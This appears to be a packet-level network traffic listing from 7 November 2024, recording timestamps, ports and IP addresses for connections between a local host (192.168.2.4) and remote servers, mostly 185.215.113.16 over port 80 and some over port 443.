Nov 7, 2024 07:33:26.135624886 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.135636091 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.135644913 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.135658979 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.135674953 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.135977030 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.135987997 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.136006117 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.136018038 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.136028051 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.136033058 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.136039019 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.136049032 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.136059999 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.136068106 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.136071920 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.136084080 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.136087894 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.136095047 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.136132002 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.136296034 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.136307001 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.136317015 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.136331081 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.136341095 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.136343956 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.136368990 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.136382103 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.138686895 CET	49900	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:26.138693094 CET	443	49900	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:26.141618013 CET	49906	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:26.141658068 CET	443	49906	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:26.141839981 CET	49906	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:26.149260998 CET	49906	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:26.149279118 CET	443	49906	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:26.164125919 CET	49907	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:26.164139986 CET	443	49907	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:26.164284945 CET	49907	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:26.164519072 CET	49907	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:26.164530039 CET	443	49907	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:26.167557955 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.167570114 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.167614937 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.167993069 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.168005943 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.168018103 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.168040991 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.168078899 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.168149948 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.168162107 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.168174028 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.168188095 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.168211937 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.168323994 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.168335915 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.168345928 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.168369055 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.168394089 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.168473005 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.168483973 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.168494940 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.168504000 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.168514013 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.168514967 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.168525934 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.168540955 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.168564081 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.168618917 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.168631077 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.168659925 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.168766022 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.168776035 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.168786049 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.168797970 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.168812990 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.168840885 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.169014931 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.169024944 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.169034958 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.169047117 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.169058084 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.169059038 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.169068098 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.169085979 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.169111967 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.169347048 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.169358015 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.169368029 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.169378042 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.169388056 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.169392109 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.169416904 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.169440985 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.209388018 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.209400892 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.209412098 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.209466934 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.209505081 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.235255003 CET	443	49902	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:26.235419035 CET	443	49902	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:26.235563040 CET	49902	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:26.239943981 CET	49902	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:26.239952087 CET	443	49902	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:26.239963055 CET	49902	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:26.239968061 CET	443	49902	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:26.250392914 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.250423908 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.250435114 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.250475883 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.250545979 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.250557899 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.250569105 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.250585079 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.250613928 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.250694036 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.250705957 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.250716925 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.250742912 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.250756025 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.250766993 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.250777006 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.250813007 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.250828028 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.250843048 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.250874996 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.250900030 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.250920057 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.250931025 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.250987053 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.250992060 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.250998974 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.251009941 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.251032114 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.251056910 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.251068115 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.251105070 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.251137972 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.251148939 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.251159906 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.251173973 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.251192093 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.251274109 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.251283884 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.251295090 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.251306057 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.251310110 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.251321077 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.251326084 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.251333952 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.251351118 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.251372099 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.251522064 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.251533031 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.251542091 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.251552105 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.251562119 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.251570940 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.251573086 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.251595020 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.251617908 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.251677036 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.251688004 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.251717091 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.251741886 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.251842976 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.251853943 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.251864910 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.251876116 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.251887083 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.251892090 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.251897097 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.251909018 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.251920938 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.251924992 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.251940012 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.251966000 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.252132893 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.252145052 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.252156019 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.252180099 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.252191067 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.252214909 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.252229929 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.252240896 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.252250910 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.252255917 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.252265930 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.252274036 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.252278090 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.252288103 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.252304077 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.252321959 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.252629995 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.252640009 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.252670050 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.252681971 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.252737999 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.252748013 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.252758980 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.252769947 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.252779961 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.252790928 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.252790928 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.252806902 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.252836943 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.252847910 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.253036976 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.253047943 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.253060102 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.253077030 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.253082991 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.253087997 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.253098965 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.253104925 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.253104925 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.253117085 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.253129959 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.253129959 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.253149033 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.253180981 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.253457069 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.253468037 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.253479004 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.253510952 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.253550053 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.253602982 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.253614902 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.253624916 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.253635883 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.253650904 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.253669977 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.253707886 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.253720045 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.253731012 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.253741980 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.253751993 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.253755093 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.253761053 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.253772020 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.253782988 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.253793955 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.253803968 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.253807068 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.253818989 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.253823996 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.253837109 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.253850937 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.254380941 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.254391909 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.254401922 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.254412889 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.254422903 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.254425049 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.254437923 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.254448891 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.254451990 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.254460096 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.254466057 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.254472017 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.254481077 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.254492044 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.254496098 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.254502058 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.254513025 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.254520893 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.254524946 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.254534006 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.254544973 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.254548073 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.254554987 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.254556894 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.254565954 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.254586935 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.254621983 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.255049944 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.255060911 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.255072117 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.255083084 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.255095005 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.255101919 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.255116940 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.255147934 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.255311012 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.255332947 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.255343914 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.255356073 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.255362988 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.255367041 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.255382061 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.255393028 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.255398989 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.255403996 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.255414009 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.255424023 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.255431890 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.255434990 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.255445004 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.255453110 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.255456924 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.255466938 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.255474091 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.255476952 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.255489111 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.255491972 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.255500078 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.255516052 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.255543947 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.256026983 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.256037951 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.256048918 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.256059885 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.256072044 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.256083012 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.256083012 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.256114960 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.256140947 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.256217957 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.256256104 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.256320953 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.256337881 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.256347895 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.256357908 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.256362915 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.256369114 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.256371975 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.256381035 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.256387949 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.256392002 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.256402016 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.256412983 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.256422997 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.256424904 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.256434917 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.256439924 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.256469965 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.256484032 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.256652117 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.256663084 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.256679058 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.256690025 CET	80	49882	185.215.113.16	192.168.2.4
